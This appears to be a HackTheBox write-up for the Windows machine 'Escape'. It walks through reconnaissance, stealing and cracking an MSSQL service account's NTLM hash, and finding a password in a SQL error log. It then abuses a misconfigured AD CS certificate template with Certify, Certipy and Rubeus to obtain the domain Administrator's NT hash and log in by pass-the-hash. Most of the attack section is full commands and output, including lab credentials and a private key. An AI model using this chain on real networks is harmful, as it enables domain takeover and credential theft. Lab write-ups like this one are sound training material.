Introduction
Welcome to our new HackTheBox write-up! In this article, we will guide you through the steps we took to successfully compromise the targeted machine.
Escape is an Medium Windows machine.
External Recon
Let’s do some recon !
Nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
|
└─$ nmap 10.10.11.202 -A -T4 -sV -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 13:37 CET
Nmap scan report for 10.10.11.202
Host is up (0.029s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-04 20:37:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-04T20:08:39
|_Not valid after: 2053-03-04T20:08:39
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
|
DNS scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
└─$ dig srv sequel.htb @10.10.11.202
; <<>> DiG 9.18.10-2-Debian <<>> srv sequel.htb @10.10.11.202
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41881
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;sequel.htb. IN SRV
;; AUTHORITY SECTION:
sequel.htb. 3600 IN SOA dc.sequel.htb. hostmaster.sequel.htb. 132 900 600 86400 3600
|
AD recon
First, I tried to see if anonymous login is enabled. We can confirm that using rpcclient.
1
2
|
└─$ rpcclient -U '' -N 10.10.11.202
rpcclient $>
|
It works! Now, using enum4linux, I tried to enumerate user and groups but sadly we can’t find any informations.
SMB recon
Using smbclient from impacket, we find some shares.
1
2
3
4
5
6
7
8
9
10
11
12
|
└─$ impacket-smbclient guest@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
|
On Public, we find a PDF that describe SQL procedures. At the end we find some credentials!
Credentials: PublicUser:GuestUserCantWrite1
MS-SQL server
As we know that there is a MS-SQL server, I tried newly acquired credentials on the service.
1
2
3
4
5
6
7
8
9
10
11
12
|
└─$ impacket-mssqlclient SEQUEL/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
|
It works! We have an access to the database. First, I tried to see if xp_cmdshell is enabled but it is not.
🔎 If enabled xp_cmdshell could allow us to execute command on the target.
Then, I look for more information about the database:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
# Get MS-SQL version
SQL> select @@version
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
# Get databases name
SQL> SELECT name FROM master.dbo.sysdatabases;
master
tempdb
model
msdb
|
Initial access
Stealing NTLM hash
Using the module admin/mssql/mssql_ntlm_stealer of Metasploit, I tried to steal the NTLM hash of the SQL service user. To do so, I launch a Responder.
It works! We get the user hash. Using hashcat we can try to bruteforce the hash to recover the password.
1
2
|
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --quiet
SQL_SVC::sequel:5ba7741884f371a1:3badc1217e9a080ac4[...]:REGGIE1234ronnie
|
And we get the following credentials: sql_svc:REGGIE1234ronnie
AD Recon v2
Using those credentials, we can access other shares from the SMB server. I tried to dump all shares that we have access, but I can’t find any usefull informations. I dump shares using DumpSMBShare from p0dalirius.
Then, I look for writeable shares but theu are read-only.
1
2
3
4
5
6
7
8
9
|
└─$ impacket-psexec sequel/sql_svc:REGGIE1234ronnie@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.11.202.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Public' is not writable.
[-] share 'SYSVOL' is not writable.
|
Then, using impacket again, I tried to enumerate all users of the domain using GetADUsers.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
└─$ impacket-GetADUsers -all -dc-ip 10.10.11.202 sequel.htb/sql_svc
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Querying 10.10.11.202 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2022-11-18 22:13:16.520281 2023-03-04 21:08:53.658972
Guest <never> <never>
krbtgt 2022-11-18 18:12:10.132527 <never>
Tom.Henn 2022-11-18 22:13:12.991127 <never>
Brandon.Brown 2022-11-18 22:13:13.047440 <never>
Ryan.Cooper 2023-02-01 22:52:57.246550 2023-02-07 18:13:56.485457
sql_svc 2022-11-18 22:13:13.102329 2023-03-04 21:08:37.080951
James.Roberts 2022-11-18 22:13:13.133415 <never>
Nicole.Thompson 2022-11-18 22:13:13.163173 <never>
|
We get some new users! We saw here that the user Ryan.Cooper has already logged in before.
Log in as sql_svc
We can connect into the target using evil-winrm.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
*Evil-WinRM* PS C:\Users> cd Ryan.Cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper> ls
Access to the path 'C:\Users\Ryan.Cooper' is denied.
|
Here we find agin the user Ryan.Cooper home, but access is denied.
Checking root folder we find a SQLServer directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows
|
On that directory we find a Logs directory that is containing a file ERRORLOG.BAK. On that file we find the following entry:
1
2
3
|
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
|
Trying these credentials Ryan.Cooper:NuclearMosquito3 and we are in ! We can get the user flag :)
Path to the privesc
Local recon as Ryan.Cooper
Running a WinPeas scan, we found some port listening.
1
2
3
4
5
6
7
8
9
|
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 49708 0.0.0.0 0 Listening 2608 certsrv
TCP 0.0.0.0 49712 0.0.0.0 0 Listening 3100 dns
TCP 0.0.0.0 49767 0.0.0.0 0 Listening 5188 sqlservr
TCP 0.0.0.0 57877 0.0.0.0 0 Listening 1756 dfsrs
[...]
|
Here we found a process name certsrv.
With some research, I found that certificate server could be exploited to privesc if some server configuration are misconfigured. I found and interesting part that talk about ad-certificates/domain-escalation on Hacktricks.
Exploiting certificate server
ADCS recon
First, we can use Certify.exe, a C# tool that enumerate & abuse misconfigurations in Active Directory Certificate Services (AD CS).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
|
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
|
The result shows that one of the Certificates Templates are vulnerable.
💡 Certificate templates in ADCS (Active Directory Certificate Services) are pre-configured templates that define the parameters for a particular type of certificate that can be issued by the certificate authority (CA).
Here, there is 3 important information:
Template Name: UserAuthentication: The name of the template ;msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT: means that any user that is requesting a new certificate, based on this certificate template, can request the certificate for another user ;Enrollment Rights: sequel\Domain Users: means that any domain user can request new certificates based on this template.
So we can request new certificates using that template. Let’s try to exploit it !
Requesting a new certificate
Again, using Certify.exe, we can request a new certificate. We need to provide name of the CA. It can be found in the previous command result (dc.sequel.htb\sequel-DC-CA). Then the name of the template (UserAuthentication) and the name of the user we want to impersonate.
🔎 Reminder: we can impersonate as the ENROLLEE_SUPPLIES_SUBJECT is set for that template.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
|
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 20
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA6V7o2DnB8feyDwBYwNqHK8rL92S54nG7VfwgbPzOCUagdF91
T4rKDhfZRgT0dXfDV3/q6+01VI5AdRklBi2Cj7wmf32U6Qkaiv3ztRNDkfvURfhs
wYZWNeI17ejj0uIJPvk3TJhRJ2VzENnR51wvJgL+V+DJiM+3cFEC9nqiSrqXlVah
6BIRkHyVcukF8+2qbKT7bghxLV/2oVk0jASWTUwDqO/kjDnuFzFcTAQraxromwuK
x9oVyuCXEc/wxrrb3AZ3A3eZVQuy9XfOG6f4YPX0agrZum+I/LxFVAfbJyeVZOKA
gl6zbOy7RIx9BxxfRHUG12EWRBDbOI+KCWshzQIDAQABAoIBACc+o6+A/wF+4v2s
1EASP7r4jpZa5PuUnqlWDenmFYvvyZnoV6T5tQLrtckVmjqK2lnDlDD6ogZHKcXH
ZbeFPbiILn0wFDOgKUuIa0xfIfTRwZ/GqBtfSO4kzWblzDIxetaROGB0GOmkINaL
msXqda9Rv43tqlaMf8+uf+4NL2+bYQpYhee94nWs+wCsmtfeDYx39ApOysgo9ABD
/YYGv6nOCp/8OgAaGM7WRUU0UGmR0w2uxh3Tcpd7+aGdol24t0UhMLahkiOXLppl
ZUws0KPwkbGTCn7iHRTTV2uNpXE8fEgw2k9vUhQjBQ4/VBAvEovwHcYc4G7acE5y
IPtb0A0CgYEA/4kAANotdRKDRpnrYTGsYzzYHwwoUa306nPXFNfnUMzueYAuRd47
33FT5Uhezlhd8KcXiy85Z7qXQb+nHuuDdvzBJ0UUGNeSZ3jYWY8qDvgrchzDiT21
313iKMQbktTRrSMABrcoitzBSllWwfvBCwKE6+QmKJyRZTtixaSCFAsCgYEA6cuW
emVmMqCY3wjB6VFp9uuo5Do6gKnFB9Q39eRgaKITnfL8bzdoxT9tFV/TaT9gqvBn
N0K9PbuVJeXotbfuOY4HyH0uFPxFJIT2Pl3whl6E7N7PgDM3a/89bjBt93di8xbc
0dKbVFCXYQBK1ojtHeEzFFMgBGaxlYM3O7UBsIcCgYBkyqr/qw8nEGhLXsbjDW7L
reIpTOhSX2UtXQfHJuoMiui9b/vQfznqho7q70LF7UEQfTfiJHxmF8k1m9zVa1vt
gQDG9o5Yxh7vRVFA8iFKykSIvCO8bGTid+uO3NtrbRpPSnDmNTR+oVh0dQytcxnP
t+yqBtGuTyNiZKwu/RZ5xQKBgCj/DjAAP9940dWqT3Z+VDp8MG102HVfT7GDwRxZ
I561bQMxbJqD+Nc9u/8XgpbeCjFvXmoORejhT9IJcrkKu7dT9IFvkfkUE3vH5PYi
ut6VDHIM0A4G7Rz+8OK1k1LlmHBP/gC9EYfDaggUaQsdj5bBupdBzEd5SoKRM8pA
fz9ZAoGAe4OrHxoeJBikqCk/muA27TtNjBaYtB0QhodFw2jeKM7ODKyHAfQcocfh
ALttmypEovKvLb9YeJZCmdyM5FV3o3MgUpozQUJ/O4KAQpNe+kwiJeWDsTn8FSBd
mpZmOpNEJZB+NlPUY7gI616cQWqT0M5maHTYT9tIVDBi+yTg6Ms=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAABQdHBOofMHCKQAAAAAAFDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjMwMzA1MDcwNTI1WhcNMjUwMzA1
MDcxNTI1WjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDpXujYOcHx97IPAFjA2ocrysv3
ZLnicbtV/CBs/M4JRqB0X3VPisoOF9lGBPR1d8NXf+rr7TVUjkB1GSUGLYKPvCZ/
fZTpCRqK/fO1E0OR+9RF+GzBhlY14jXt6OPS4gk++TdMmFEnZXMQ2dHnXC8mAv5X
4MmIz7dwUQL2eqJKupeVVqHoEhGQfJVy6QXz7apspPtuCHEtX/ahWTSMBJZNTAOo
7+SMOe4XMVxMBCtrGuibC4rH2hXK4JcRz/DGutvcBncDd5lVC7L1d84bp/hg9fRq
Ctm6b4j8vEVUB9snJ5Vk4oCCXrNs7LtEjH0HHF9EdQbXYRZEENs4j4oJayHNAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZAIBBTApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFMCLcMk9e0PU5oaimKUjERvUdaeT
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEALfJyTBZ6hPuJoVVtNpSktJtV0NU2hPnik8RfeqVPROw9PT/x9yhTSd+t
L2YbB7P1VrroE5WvNbPgPclKUxBs5+yyI24cztI30xR7AxKxDdQ9hcbSIEif7VF1
ehzf2LjAcgA2d2TOrEe0cjYIldssYrMMoPN0E+ZR+EFo/wDBeIfYFuDSNyx+xAyN
81hcm3/Ns/js/2qY0osxGYJGjCHLv3gZ3DpfA+f+m/kMqGRQ+4frFScgL4wjCbti
N373egjkjPOxE2HXpaSfhDvA/ZH3GuKiOK4Bh12Ik6JtI490PLOhaigNW+HvKDmo
0eNmwYczafmdYoj6MQV4L73Bz2OSmQ==
-----END CERTIFICATE-----
|
The command gave us a certificate that we can save to a file cert.pem.
Getting a TGT
Now we will use Certipy to request a TGT using the certificate to authenticate. To do so, we first need to convert the certificate to .pfx format. This is needed to be passed to Certipy. We can convert the certificate with openssl.
1
2
|
# get cert.pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
|
We can now ask for a TGT.
1
2
3
4
5
6
7
8
9
|
└─$ certipy auth -pfx cert.pfx -dc-ip 10.10.11.202 -u 'Administrator' -domain sequel.htb
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
|
💡 If you get a clock skew error it means that your host is not synchronised with the AD. To resolve this issue you can try these following commands:
Using ntpdate: sudo ntpdate -u <AD_IP>
Using faketime: faketime '<timestamp>' <command>
Using net time: sudo net time set -S <DC_IP>
We now have the NT hash of user Administrator, we can use it to connect into win-rm.
1
2
3
4
5
|
# pass the hash
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
|
We can get the root flag :)
Another solution using Rubeus
If you can’t or don’t want to use certipy you can do the same with Rubeus. We first start be requesting the TGT.
1
2
|
# get TGT
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /outfile:admin_tgt.kirbi
|
Once we have the TGT, it is possible to extract NT hash from it. We start by converting the TGT admin_tgt.kirbi using ticketConverter from Impacket.
1
2
|
# convert admin_tgt.kirbi to ccache
└─$ impacket-ticketConverter admin_tgt.kirbi admin.ccache
|
Next, we export the environment variable KRB5CCNAME with the path to our ticket: export KRB5CCNAME="admin.ccache"
Then, we can provide cert.pfx & admin.ccache into the gettgtpkinit.py from PKINITtools.
1
2
3
4
5
6
7
8
9
10
11
12
|
# PKINIT pre-authentication
└─$ python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "" "sequel.htb/Administrator" "admin.ccache" -dc-ip 10.10.11.202
2023-03-05 09:09:23,448 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-03-05 09:09:23,529 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-03-05 09:09:23,593 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-03-05 09:09:23,593 minikerberos INFO e0abbd319bd9ab00b1d21e1850ec7b30c9430f103a35a39f92b9f05b38a5cf86
INFO:minikerberos:e0abbd319bd9ab00b1d21e1850ec7b30c9430f103a35a39f92b9f05b38a5cf86
2023-03-05 09:09:23,597 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
|
This is used to trigger a PKINIT pre-authentication. We also get a key that we can use on the second tool getnthash.py, always from PKINITtools, to get our NT hash.
1
2
3
4
5
6
7
8
|
# Extract NT from TGT
└─$ python3 getnthash.py -key e0abbd319bd9ab00b1d21e1850ec7b30c9430f103a35a39f92b9f05b38a5cf86 "sequel.htb/Administrator" -dc-ip 10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a52f78e4c751e5f5e17e1e9f3e58f4ee
|
We can then use the hash to authenticate :)
💡 Commands are taken from The Hacker Recipes
